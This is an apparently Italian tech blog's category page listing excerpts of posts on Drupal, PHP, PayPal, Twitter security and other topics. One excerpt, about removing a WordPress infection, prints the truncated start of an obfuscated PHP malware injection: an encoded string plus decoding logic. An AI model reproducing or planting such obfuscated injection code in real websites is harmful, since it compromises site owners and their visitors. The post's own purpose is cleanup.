Category: Senza categoria

  • Display online pdfs attachment in drupal with pdf.js

    pdf.js ( is a mozilla project for rendering pdf files with javascript. Now it came with a standard Firefox download, but not everyone is using Firefox, thus it came the drupal module: Simple steps: activate pdf drupal module and libraries (on which pdf depends) read but it could be misleading download the package from, the package, or git…

  • Costruire un archivio con PHAR per farne una copia statica, o usare il dbms?

    Mi è stato chiesto di fare una versione statica di una parte di sito (una sottocartella), così ho preso wget e scaricato i file (wget -nc -r http://host.domain/directory). La parte in questione è una applicazione PHP/MySql che usa mod_rewrite, così il numero di file è effettivamente molto alto. Ora il problema sarebbe quello di gestire…

  • Rimuovere un virus da wordpress

    Non ho voglia di indagare da dove entrano e come fanno, suppongo sia qualcosa riguardo a xmlrpc, comunque mi capita di trovare in alcuni siti dei file in wordpress con un bel pezzo di codice all’inizio che fa più o meno così: <?php $nuvjmhnfek = ‘x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!})q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%xbq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>utcvt)!gj!|!*bubE{h%x5c%x78 ….. $nlbrprkqdg = explode(chr((208-164)),’3218,48,5590,70,4453,66,8070,26,2370,30,2907,69,714,25,4556,24,7366,42,6995,70,7662,67,7952,20,4821,58,5660,38,9197,50,3794,32,5475,53,5299,25,2451,49,3716,20,9116,48,8581,59,1739,50,6545,58,1693,46,950,66,7211,50,5528,62,7895,57,9591,46,9678,20,2282,23,6368,70,93,51,8483,44,1216,66,10078,28,4288,43,3130,61,2770,36,7408,26,6930,65,5039,22,8640,63,1059,70,7729,28,5919,23,5942,42,374,57,0,43,4580,43,1336,24,5061,55,3878,39,9371,41,9765,20,4141,66,3451,70,7972,36,8867,50,7470,51,6077,53,4076,65,9301,37,3521,62,9338,33,8008,36,5828,68,3040,67,7825,70,144,66,1016,43,3618,32,8203,39,6503,42,9463,21,7261,43,3107,23,2071,51,797,55,6832,56,1129,48,9045,22,1553,56,9484,43,10047,31,493,27,3365,23,4879,21,1456,35,5237,62,2860,47,852,38,9698,67,6130,23,9940,45,6335,33,280,52,1609,52,8527,54,4352,42,8917,65,2700,70,7107,48,520,52,5776,24,3191,27,3650,66,3855,23,4011,65,4254,34,7757,68,3826,29,8385,27,5205,32,6268,67,1953,70,9164,33,210,36,2228,54,7304,62,9785,66,9985,36,6235,33,4952,38,9527,64,1491,62,4394,59,9434,29,6153,34,8791,45,9067,49,8744,47,2806,54,8044,26,2047,24,332,42,8242,45,4207,47,43,50,2976,64,4990,49,5324,38,2023,24,3388,63,8412,43,9637,41,2609,64,6438,65,8351,34,3736,58,9907,33,10021,26,6053,24,1856,41,246,34,8160,43,4623,67,2122,70,1360,36,9247,54,8703,41,2589,20,5430,45,4519,37,1177,39,1661,32,1789,67,7626,36,5723,53,1282,54,762,35,4900,52,6603,49,2500,37,572,56,1396,20,6801,31,6652,29,2673,27,5362,68,5116,24,5698,25,7434,36,890,60,9412,22,7584,42,3266,70,6888,42,3968,43,7155,56,6735,66,5800,28,7065,42,2537,52,6681,54,739,23,7521,63,2192,36,6211,24,8096,64,4690,34,4724,59,2305,65,5140,65,3336,29,689,25,5896,23,1897,56,9851,56,3917,51,8455,28,1416,40,628,61,8836,31,5984,34,2400,51,6187,24,4783,38,6018,35,8982,63,431,62,3583,35,8287,64,4331,21’); $nmtziabvfq=substr($nuvjmhnfek,(64154-54048),(22-15)); if (!function_exists(‘mytkhaykjh’)) { function…

  • Little tool spot (php to UML)

    This is my little endorsement to this tool really usefull to extract uml from an existing PHP project. In GNU/Linux system (actually Bsd world too) there is at least Umbrello which read and write XMI format. I am not expert of MS Windows world I just tryed googling it, I found this: . Umodel is 149$…

  • Twitter Insecure by Design

    It happens I have a new identity … no, someone has my credential or such for using my twitter account. Twitter does not reply, there is no team that can fix it. Problem with twitter is that it is insecure by design. You indicate an email address and confirm it, at registation time, or whenever…

  • PayPal SEPA o no

    visto: SEPA (Single Euro Payment Area) a parte, le tariffe sulle transazioni paypal sono differenti nel caso i fondi provengano da carta di credito, e nel caso provengano da trasferimento bancario. Me ne accorgo solamente ora. Negli e-commerce siamo abituati ad aggiungere una riga per le tasse, nel caso il cliente scelga di pagare…

  • Runyourjs drupal module

    Done, as said in, I created a sandbox project: I attach here an archive as git archive –prefix=runyourjs/ HEAD |gzip – > ../runyourjs.tar.gz I have wrote this for my personal use, if you found it useful, share and give feedback (in drupal). Thanks post by   p.s.: of course filename is protected 🙂

  • Commissione europea e open standard … source … cosa?

    Punto informatico ( and ( talks about an direction approved by European Commission on adoption of open standars, then later, they use open source, as synonimous. Some time ago I had an argue in linkedin during which I sustained that public administration should adopt opensource software because it is open and cheap, a microsoft supporter…

  • Upload a javascript as attachment to drupal entity (and run it) … and what is it munge?

    I am in the need to attach javascript code to my content for tech blog purpose, and give capability to run it by visitors. Do you think there are security concerns? Me no. PHP filter is there in Drupal core from the begin, and it was not a security concern, unless you give permission to…

  • Unesco World Heritage List

    Ok, following I can not find a good export of unesco world heritage sites, interested in Italy. first step is to download xml format (, use an online service to translate to csv (, save it (download), then transform from dos to unix, import in libreoffice calc (google docs does not work), saved as ods format,…